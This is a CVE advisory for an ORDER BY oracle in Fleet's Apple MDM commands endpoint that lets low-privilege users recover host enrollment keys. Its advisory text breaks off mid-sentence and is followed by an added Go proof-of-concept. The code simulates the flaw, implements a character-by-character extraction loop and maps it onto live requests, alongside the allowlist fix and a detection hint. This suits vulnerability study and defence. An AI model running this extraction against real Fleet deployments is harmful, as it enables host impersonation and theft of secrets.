CVE-2026-46371
Published 2026-06-12
Severity: medium
Fleet: Observer-level enrollment secret extraction via ORDER BY oracle on Apple MDM commands endpoint

### Summary

A vulnerability in Fleet's Apple MDM commands listing endpoint allowed authenticated users with the lowest-privilege Observer role to extract sensitive values from joined database tables, including host enrollment secrets and Apple Push Notification Service (APNS) tokens, through a cursor-based binary search oracle. The endpoint accepted a user-supplied `order_key` parameter that was not validated against a column allowlist.

### Impact

The `GET /api/v1/fleet/mdm/apple/commands` endpoint constructs its query using a deprecated helper that did not restrict which columns could appear in the `ORDER BY` clause. The underlying query joins the `hosts` and `nano_enrollments` tables, so any column on those tables could be supplied as `order_key`.

An attacker with Observer credentials could then use the cursor-based pagination parameter (`after`) to binary-search the value of the chosen column one character at a time. The targeted values never appeared in the response body; each request answered only whether any row sorts after the supplied cursor, and that yes/no answer was enough to recover the value character by character.

With extracted `node_key` or `orbit_node_key` values, an attacker could impersonate enrolled hosts to Fleet's osquery and Orbit endpoints, submit fabricated host data, and retrieve pending scripts and commands. The APNS values are exploitable only by a party that also possesses the organization's APNS certificate.

Exploitation required authenticated Observer access and a Fleet deployment with Apple MDM enabled and at least one queued MDM command. Instances without Apple MDM configured were not affected.

### Workarounds

If an immediate upgrade is not possible, administrators should:

- Restrict the Observer role to fully trusted users until the patch is applied
- Rotate `node_key` and `orbit_node_key` for any host suspected of exposure by re-enrolling the affected hosts

### For more information

If there are any questions
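The following Go program is an added example, not Fleet's code, that makes the oracle concrete: a simulated listing endpoint over constructed rows, the allowlist fix, and the extraction loop an attacker would drive through `order_key` and `after`. It assumes the cursor is applied as "column strictly greater than `after`" and compares strings byte-wise; the real database collation may order characters differently, so the alphabet and the `~` sentinel would have to be adjusted against the target. The row data, column names other than `node_key`, and the `~` sentinel are assumptions made for the illustration.

```go
package main

import (
	"errors"
	"fmt"
)

// Constructed sample rows standing in for the joined hosts/nano_enrollments
// result set. NodeKey is never placed in a response; the only observable is
// whether a query returns at least one row.
type enrollmentRow struct {
	HostID  int
	Command string // a column the endpoint legitimately sorts by (assumed name)
	NodeKey string // sensitive column reachable only through ORDER BY
}

var sampleRows = []enrollmentRow{
	{HostID: 1, Command: "InstallProfile", NodeKey: "Ab3kQ9zLm2XpR7"},
	{HostID: 2, Command: "DeviceLock", NodeKey: "Zx1vTq8NwE4cH0"},
}

func columnValue(r enrollmentRow, orderKey string) (string, bool) {
	switch orderKey {
	case "command":
		return r.Command, true
	case "node_key":
		return r.NodeKey, true
	}
	return "", false
}

// vulnerableOracle models the unpatched endpoint: any joined column may be
// named in order_key, and the cursor is applied as
// `WHERE <order_key> > ? LIMIT 1` (assumed cursor semantics).
// It reports only whether some row follows the cursor.
func vulnerableOracle(orderKey, after string) (bool, error) {
	for _, r := range sampleRows {
		v, ok := columnValue(r, orderKey)
		if !ok {
			return false, errors.New("unknown column")
		}
		if v > after {
			return true, nil
		}
	}
	return false, nil
}

// hardenedOracle applies the fix: order_key must appear in an explicit
// allowlist of columns the endpoint is meant to expose for sorting.
var allowedOrderKeys = map[string]bool{"command": true}

func hardenedOracle(orderKey, after string) (bool, error) {
	if !allowedOrderKeys[orderKey] {
		return false, fmt.Errorf("order_key %q is not sortable", orderKey)
	}
	return vulnerableOracle(orderKey, after)
}

// keyAlphabet must be in the same order the database compares characters;
// here that is ascending ASCII. highSentinel sorts after every alphabet char.
const keyAlphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
const highSentinel = "~"

// extractMax recovers the lexicographically greatest value of orderKey using
// only the boolean oracle. With known prefix p, oracle(p+c+sentinel) is true
// exactly when the target's next character is greater than c, so the first c
// for which it is false is that character. oracle(p) alone being false means
// the target equals p. Returns the value and the number of requests issued.
func extractMax(oracle func(string, string) (bool, error), orderKey string) (string, int, error) {
	prefix, queries := "", 0
	ask := func(after string) (bool, error) {
		queries++
		return oracle(orderKey, after)
	}
	for {
		more, err := ask(prefix)
		if err != nil {
			return "", queries, err
		}
		if !more {
			return prefix, queries, nil
		}
		lo, hi := 0, len(keyAlphabet) // answer index lies in [lo, hi)
		for lo < hi {
			mid := (lo + hi) / 2
			gt, err := ask(prefix + string(keyAlphabet[mid]) + highSentinel)
			if err != nil {
				return "", queries, err
			}
			if gt {
				lo = mid + 1
			} else {
				hi = mid
			}
		}
		if lo == len(keyAlphabet) {
			return "", queries, errors.New("character outside assumed alphabet")
		}
		prefix += string(keyAlphabet[lo])
	}
}

func main() {
	v, n, err := extractMax(vulnerableOracle, "node_key")
	fmt.Printf("vulnerable: value=%q requests=%d err=%v\n", v, n, err)
	_, _, err = extractMax(hardenedOracle, "node_key")
	fmt.Printf("hardened: err=%v\n", err)
}
```

Against a live endpoint each `ask` is one authenticated `GET /api/v1/fleet/mdm/apple/commands?order_key=node_key&after=...` request, so a full key costs on the order of seven requests per character. Because the cursor only exposes a strictly-greater-than predicate, the loop recovers the largest value in the joined result set; with a single enrolled host and queued command that is simply that host's key. For a defender, the same shape is the detection signal: a burst of requests to this endpoint from one Observer account with `order_key` set to a column the UI never sorts by.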
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | fleetdm_fleet_v4 | >= 0 < 4.84.2 | 4.84.2 |
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.